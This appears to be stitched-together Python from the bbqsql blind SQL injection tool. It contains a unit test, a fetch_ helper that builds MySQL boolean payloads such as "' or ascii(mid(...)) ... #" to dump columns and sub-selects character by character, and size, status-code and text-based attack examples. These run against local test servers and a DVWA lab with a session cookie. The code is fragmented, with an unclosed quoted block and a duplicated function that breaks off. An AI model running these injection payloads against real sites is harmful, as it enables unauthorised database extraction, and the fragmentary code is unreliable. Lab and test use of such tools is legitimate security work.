 def test_frequency_technique(self):
     """Run the ``frequency_search`` technique against the local
     ``/boolean`` test oracle and check it recovers ``test_data``.

     The oracle is compared on ``comparison_attr='size'``, i.e. (presumably)
     the response body length distinguishes a true from a false injection.
     ``concurrency=1`` keeps the request order deterministic for the test.
     """
     # URL template: ${injection} is the slot the rendered query goes into.
     target = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
     # Query template; `quote` URL-encodes the rendered payload.
     payload = bbqsql.Query(
         "row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",
         encoder=quote)
     attack_kwargs = dict(
         url=target.q_string,
         query=payload.q_string,
         method='GET',
         comparison_attr='size',
         technique='frequency_search',
         concurrency=1,
     )
     attack = bbqsql.BlindSQLi(**attack_kwargs)
     self.assertEqual(attack.run(), test_data)
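def fetch_(field, interact=False):
    """Extract *field* from the target through boolean-based blind SQLi.

    ``field`` is spliced verbatim into the injected MySQL expression
    ``' or ascii(mid(<field>, <char_index>, 1)) <comparator> <char_val> #``.
    Nothing is escaped here on purpose: this *is* the attack payload, so
    ``field`` must already be a valid column name or sub-select for the
    target.  If ``field`` contains the word ``from`` (any case) it is
    treated as a sub-select and paged one row at a time with
    ``limit 1 offset ${row_index}``; this is a plain substring test, so a
    column literally named e.g. ``fromdate`` is paged too (harmless, just
    slower).

    Args:
        field: column name or ``SELECT ... FROM ...`` statement to dump.
        interact: when True, ask the operator to confirm before the
            attack starts; a setup error (``b.error``) is printed instead.

    Returns:
        Whatever ``BlindSQLi.run()`` returns, or ``None`` when ``interact``
        is set and the attack was declined, interrupted, or could not be
        set up.
    """
    # Case-insensitive check: a sub-select written as 'SELECT ... FROM ...'
    # was previously not paged at all.
    sql = ('(%s limit 1 offset ${row_index:1})'
           if 'from' in field.lower() else '(%s)') % field
    query = bbqsql.Query(
        "' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #"
        % sql)
    # `url` and `attack_config` are module-level (target URL template,
    # cookies / technique / concurrency).  Oracle: HTTP status code.
    b = bbqsql.BlindSQLi(url=url,
                         query=query,
                         method='GET',
                         comparison_attr='status_code',
                         **attack_config)
    if not interact:
        return b.run()
    if b.error:
        # Setup failed; surface the reason rather than silently returning.
        print(b.error)
        return None
    # Prefer raw_input (Python 2) -- Python 2's input() would eval the
    # operator's reply.  On Python 3 raw_input does not exist and input()
    # is the safe equivalent.
    try:
        prompt = raw_input
    except NameError:
        prompt = input
    try:
        answer = prompt('Everything lookin groovy?[y,n] ')
    except KeyboardInterrupt:
        return None
    if answer and answer[0] != 'n':
        return b.run()
    # Declined: nothing to report (b.error is known to be empty here).
    return None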
'''
#STATUS CODE BASED EXAMPLE
url     = bbqsql.Query('http://127.0.0.1:8090/error?${injection}')
query   = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)

bh      = bbqsql.BlindSQLi(url=url,query=query,method='GET',comparison_attr='status_code',technique='frequency_search',concurrency=35)

start = time()
results = bh.run()
stop = time()

print "dumped db in %f seconds" % (stop-start)
'''

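#SIZE BASED EXAMPLE
# Oracle: the /boolean endpoint is compared on response *size*
# (comparison_attr='size').  ${injection} is the slot in the URL that
# receives the rendered `query` template; `quote` (presumably urllib's)
# URL-encodes the rendered payload.
url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
query = bbqsql.Query(
    "row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",
    encoder=quote)

# concurrency=3: modest parallelism, the target here is a local test server.
bh = bbqsql.BlindSQLi(url=url,
                      query=query,
                      method='GET',
                      comparison_attr='size',
                      technique='frequency_search',
                      concurrency=3)

start = time()
results = bh.run()
stop = time()

# Parenthesised call form so this line runs under both Python 2 and 3
# (the bare print statement is a SyntaxError on Python 3).
print("dumped db in %f seconds" % (stop - start))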

#TEXT BASED EXAMPLE
'''
url     = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
query   = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)
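# Progress output from bbqsql: pretty-print every 1. (presumably seconds)
# and do not run quiet.
bbqsql.settings.PRETTY_PRINT_FREQUENCY = 1.
bbqsql.settings.QUIET = False

# Options forwarded unchanged to every BlindSQLi instance (**attack_config).
attack_config = {}
# DVWA is cookie-authenticated: `sessid` (defined elsewhere in this script)
# must be a live PHPSESSID.  Treat it as a credential -- never commit a real
# value.  'security' is DVWA's difficulty cookie, set to 'low' here.
attack_config['cookies'] = {
    'PHPSESSID': sessid,
    'security': 'low',
}
# Search technique.  'binary_search' used to be assigned on the preceding
# line and immediately overwritten, leaving a dead store; only the value
# that actually took effect is kept.
attack_config['technique'] = 'frequency_search'
attack_config['concurrency'] = 5
attack_config['menu_mode'] = False  # prevent printing '\n'*100

# dvwa
# Target URL template; the ${dejection} slot receives the rendered query,
# URL-encoded by `quote`.  NOTE(review): the other bbqsql examples on this
# page name the slot ${injection} -- confirm the spelling used here is the
# one bbqsql looks for.
url = bbqsql.Query(
    'http://localhost:9191/vulnerabilities/sqli_blind/?id=${dejection}&Submit=Submit',
    encoder=quote)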


def fetch_(field, interact=False):
    sql = ('(%s limit 1 offset ${row_index:1})'
           if 'from' in field else '(%s)') % field
    query = bbqsql.Query(
        "' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #"
        % sql)
    b = bbqsql.BlindSQLi(url=url,
                         query=query,
                         method='GET',
                         comparison_attr='status_code',
                         **attack_config)
    if interact: